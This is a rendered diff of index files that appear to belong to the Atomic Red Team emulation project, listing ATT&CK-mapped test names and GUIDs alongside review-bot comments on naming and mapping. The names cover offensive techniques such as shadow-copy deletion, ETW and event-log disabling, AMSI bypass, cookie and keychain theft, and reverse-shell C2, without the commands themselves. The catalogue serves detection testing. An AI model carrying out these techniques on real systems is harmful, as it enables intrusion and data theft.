impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
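Review bot: #5 "ESXi - Delete VM Snapshots" is mapped to T1485 Data Destruction, but the rows directly below map deleting Volume Shadow Copies and the Windows backup catalog to T1490 Inhibit System Recovery. A VM snapshot is a recovery point rather than primary data, and deleting snapshots ahead of encrypting datastores is the ESXi analogue of deleting shadow copies, so T1490 looks like the better fit. Decide which mapping is intended and keep the two in step, since the index is where defenders map tests to detections.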
@@ -1377,6 +1404,7 @@ impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483
impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
impact,T1529,System Shutdown/Reboot,15,ESXi - vim-cmd Used to Power Off VMs,622cc1a0-45e7-428c-aed7-c96dd605fbe6,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.002,Phishing: Spearphishing Link,1,Paste and run technique,bc177ef9-6a12-4ebc-a2ec-d41e19c2791d,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
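Review bot: the three ESXi rows under T1529 now use three naming patterns: #13 "ESXi - Terminates VMs using pkill", #14 "ESXi - Avoslocker enumerates VMs and forcefully kills VMs", and the new #15 "ESXi - vim-cmd Used to Power Off VMs". For the new one, "ESXi - Power Off VMs via vim-cmd" follows the "action via tool" form used elsewhere in this diff (e.g. "ESXi - Disable Firewall via Esxcli"). Also, the unchanged T1133 context row below, "Running Chrome VPN Extensions via the Registry 2 vpn extension", is garbled; pre-existing, but it should be cleaned up in its YAML.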
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
74 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
75 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
76 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
77 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 6 SubInAcl Execution a8568b10-9ab9-4140-a523-1c72e0176924 command_prompt
78 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
79 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
80 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
91 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
92 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
93 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 13 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
94 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 14 Clear PowerShell Session History 22c779cd-9445-4d3e-a136-f75adbf0315f powershell
95 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
96 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
97 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
1268 discovery T1016.002 System Network Configuration Discovery: Wi-Fi Discovery 1 Enumerate Stored Wi-Fi Profiles And Passwords via netsh 53cf1903-0fa7-4177-ab14-f358ae809eec command_prompt
1269 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
1270 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
1320 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
1321 discovery T1614.001 System Location Discovery: System Language Discovery 7 Discover System Language with dism.exe 69f625ba-938f-4900-bdff-82ada3df5d9c command_prompt
1322 discovery T1614.001 System Location Discovery: System Language Discovery 8 Discover System Language by Windows API Query e39b99e9-ce7f-4b24-9c88-0fbad069e6c6 command_prompt
1323 discovery T1614.001 System Location Discovery: System Language Discovery 9 Discover System Language with WMIC 4758003d-db14-4959-9c0f-9e87558ac69e command_prompt
1324 discovery T1614.001 System Location Discovery: System Language Discovery 10 Discover System Language with Powershell 1f23bfe8-36d4-49ce-903a-19a1e8c6631b powershell
1325 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
1326 discovery T1012 Query Registry 2 Query Registry with Powershell cmdlets 0434d081-bb32-42ce-bcbb-3548e4f2628f powershell
1327 discovery T1012 Query Registry 3 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
1371 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
1372 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
1373 discovery T1124 System Time Discovery 5 System Time with Windows time Command 53ead5db-7098-4111-bb3f-563be390e72e command_prompt
1374 discovery T1124 System Time Discovery 6 Discover System Time Zone via Registry 25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47 command_prompt
1375 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
1376 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1377 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1378 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1379 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1380 impact T1491.001 Defacement: Internal Defacement 3 ESXi - Change Welcome Message on Direct Console User Interface (DCUI) 30905f21-34f3-4504-8b4c-f7a5e314b810 command_prompt
1381 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1382 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1383 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
1387 impact T1486 Data Encrypted for Impact 10 Akira Ransomware drop Files with .akira Extension and Ransomnote ab3f793f-2dcc-4da5-9c71-34988307263f powershell
1388 impact T1485 Data Destruction 1 Windows - Overwrite file with SysInternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1389 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1390 impact T1485 Data Destruction 5 ESXi - Delete VM Snapshots 1207ddff-f25b-41b3-aa0e-7c26d2b546d1 command_prompt
1391 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
1392 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
1393 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
1404 impact T1529 System Shutdown/Reboot 12 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1405 impact T1529 System Shutdown/Reboot 13 ESXi - Terminates VMs using pkill 987c9b4d-a637-42db-b1cb-e9e242c3991b command_prompt
1406 impact T1529 System Shutdown/Reboot 14 ESXi - Avoslocker enumerates VMs and forcefully kills VMs 189f7d6e-9442-4160-9bc3-5e4104d93ece command_prompt
1407 impact T1529 System Shutdown/Reboot 15 ESXi - vim-cmd Used to Power Off VMs 622cc1a0-45e7-428c-aed7-c96dd605fbe6 command_prompt
1408 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1409 initial-access T1566.002 Phishing: Spearphishing Link 1 Paste and run technique bc177ef9-6a12-4ebc-a2ec-d41e19c2791d powershell
1410 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
@@ -249,7 +249,7 @@
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
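Review bot: With the +/- markers lost in this rendering I read the second T1059.010 line as the new one; the renamed placeholder now carries the parent technique prefix ("Command and Scripting Interpreter: AutoHotKey & AutoIT") while every other CONTRIBUTE A TEST entry in the hunk (T1559.001 Component Object Model, T1053 Scheduled Task/Job, T1106 Native API) uses the bare sub-technique name, so either the generator pulled this display name from a different field or the other placeholders should be updated the same way. The identical one-line change recurs in hunks -251 and -350, so whatever is decided should be applied to all three index files.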
@@ -251,7 +251,7 @@
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+59 -9
@@ -122,8 +122,11 @@
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
- Atomic Test #7: Check if System Integrity Protection is enabled [macos]
- Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: rm -rf [linux]
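Review bot: Atomic Test #4 is renamed from "Detect Virtualization Environment (MacOS)" to "Detect Virtualization Environment via ioreg" while keeping its number, and three new macOS tests (#6 sysctl, #7 System Integrity Protection, #8 system_profiler) are appended. Reusing #4 is only safe if the test's GUID is unchanged, since the index rows pair each test number with a GUID and anything that selects T1497.001 test #4 by number would otherwise run a different test; please confirm the GUID in T1497.001.yaml was kept. The same rename appears again in hunk -2411 for the other index file.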
@@ -169,6 +172,7 @@
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- Atomic Test #6: SubInAcl Execution [windows]
- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
@@ -201,6 +205,7 @@
- Atomic Test #11: Prevent Powershell History Logging [windows]
- Atomic Test #12: Clear Powershell History by Deleting History File [windows]
- Atomic Test #13: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
- Atomic Test #14: Clear PowerShell Session History [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -294,6 +299,9 @@
- Atomic Test #5: Clear Windows Audit Policy Config [windows]
- Atomic Test #6: Disable Event Logging with wevtutil [windows]
- Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
- Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell [windows]
- Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell [windows]
- Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell [windows]
- [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
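Review bot: The names of new tests #8 and #9, "Modify Event Log Channel Access Permissions via Registry - PowerShell" and "Modify Event Log Channel Access Permissions via Registry 2 - PowerShell", differ only by a "2", which tells a reader nothing about how the two tests differ (a different channel, a different registry value?). Rename #9 after the thing that actually changes, in the style of #10 "Modify Event Log Access Permissions via Registry - PowerShell", whose name already distinguishes it by scope.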
@@ -323,6 +331,7 @@
- Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
- Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
- Atomic Test #24: Set a firewall rule using New-NetFirewallRule [windows]
- Atomic Test #25: ESXi - Set Firewall to PASS Traffic [windows]
- [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
- Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -484,6 +493,10 @@
- Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
- Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
- Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd [windows]
- Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell [windows]
- Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd [windows]
- Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell [windows]
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -640,6 +653,10 @@
- Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
- Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
- Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key [windows]
- Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd [windows]
- Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
- Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
- Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -991,7 +1008,6 @@
- Atomic Test #2: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry [windows]
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- Atomic Test #2: Launch Daemon - Users Directory [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
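Review bot: Atomic Test #2 "Launch Daemon - Users Directory [macos]" is dropped from T1543.004, leaving only #1, and nothing in this hunk records why. Since test numbers are what runners and the index rows key on, a short note in T1543.004.md saying the test was removed rather than renumbered would save the next reader a search. The same removal appears in hunk -1536 for the other index file.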
@@ -1108,6 +1124,7 @@
- Atomic Test #17: Modify BootExecute Value [windows]
- Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
- Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
- Atomic Test #20: Add persistence via Windows Context Menu [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -1318,7 +1335,8 @@
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- Atomic Test #5: Run Shellcode via Syscall in Go [windows]
- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md)
- Atomic Test #1: AutoHotKey script execution [windows]
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
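Review bot: T1059.010 gains its first test here ("AutoHotKey script execution [windows]") and the entry switches from the CONTRIBUTE A TEST placeholder to a link, while hunks -249, -251 and -350 keep T1059.010 as a placeholder. That is correct only if those three files are the non-Windows platform indexes; if any of them is the all-platform index it should have picked up this test as well.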
@@ -1404,12 +1422,14 @@
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
- Atomic Test #6: Command prompt writing script to file then executes it [windows]
- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1651 Cloud Administration Command](../../T1651/T1651.md)
- Atomic Test #1: AWS Run Command (and Control) [iaas:aws]
- [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1648 Serverless Execution](../../T1648/T1648.md)
- Atomic Test #1: Lambda Function Hijack [iaas:aws]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
@@ -1536,7 +1556,6 @@
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- Atomic Test #2: Launch Daemon - Users Directory [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
@@ -1638,6 +1657,7 @@
- Atomic Test #17: Modify BootExecute Value [windows]
- Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
- Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
- Atomic Test #20: Add persistence via Windows Context Menu [windows]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- Atomic Test #2: Azure AD - Create a new user [azure-ad]
@@ -1824,6 +1844,7 @@
- Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
- Atomic Test #13: Splashtop Execution [windows]
- Atomic Test #14: Splashtop Streamer Execution [windows]
- Atomic Test #15: Microsoft App Quick Assist Execution [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1831,6 +1852,8 @@
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- Atomic Test #4: run ngrok [windows]
- Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
- Atomic Test #6: VSCode tunnels (Linux/macOS) [linux, macos]
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1859,6 +1882,7 @@
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- Atomic Test #4: Linux ICMP Reverse Shell using icmp-cnc [linux]
- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1986,6 +2010,7 @@
- [T1005 Data from Local System](../../T1005/T1005.md)
- Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows]
- Atomic Test #2: Find and dump sqlite databases (Linux) [linux]
- Atomic Test #3: Copy Apple Notes database files using AppleScript [macos]
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
@@ -2030,7 +2055,8 @@
- Atomic Test #1: Enable Apple Remote Desktop Agent [macos]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.004 Remote Services: SSH](../../T1021.004/T1021.004.md)
- Atomic Test #1: ESXi - Enable SSH via PowerCLI [linux]
- Atomic Test #1: ESXi - Enable SSH via PowerCLI [windows]
- Atomic Test #2: ESXi - Enable SSH via VIM-CMD [windows]
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- T1021.008 Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
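Review bot: The platform tag for T1021.004 Atomic Test #1 "ESXi - Enable SSH via PowerCLI" changes from [linux] to [windows], which matches #2 "ESXi - Enable SSH via VIM-CMD [windows]" and the other ESXi tests in this diff (for example hunk -323's #23 "ESXi - Disable Firewall via Esxcli [windows]"). It also removes the test from the Linux index entirely, so if it was previously being run from Linux hosts the change deserves a mention on the T1021.004 page.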
@@ -2113,6 +2139,8 @@
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
- Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
@@ -2132,6 +2160,7 @@
- Atomic Test #1: Keychain Dump [macos]
- Atomic Test #2: Export Certificate Item(s) [macos]
- Atomic Test #3: Import Certificate Item(s) into Keychain [macos]
- Atomic Test #4: Copy Keychain using cat utility [macos]
- [T1003.004 OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1 [windows]
@@ -2273,6 +2302,9 @@
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- Atomic Test #13: List Credential Files via PowerShell [windows]
- Atomic Test #14: List Credential Files via Command Prompt [windows]
- Atomic Test #15: Find Azure credentials [macos, linux]
- Atomic Test #16: Find GCP credentials [macos, linux]
- Atomic Test #17: Find OCI credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
- Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
@@ -2411,12 +2443,16 @@
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- Atomic Test #11: ESXi - Local Account Discovery via ESXCLI [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
- Atomic Test #7: Check if System Integrity Protection is enabled [macos]
- Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -2512,6 +2548,8 @@
- Atomic Test #36: Display volume shadow copies with "vssadmin" [windows]
- Atomic Test #37: Identify System Locale and Regional Settings with PowerShell [windows]
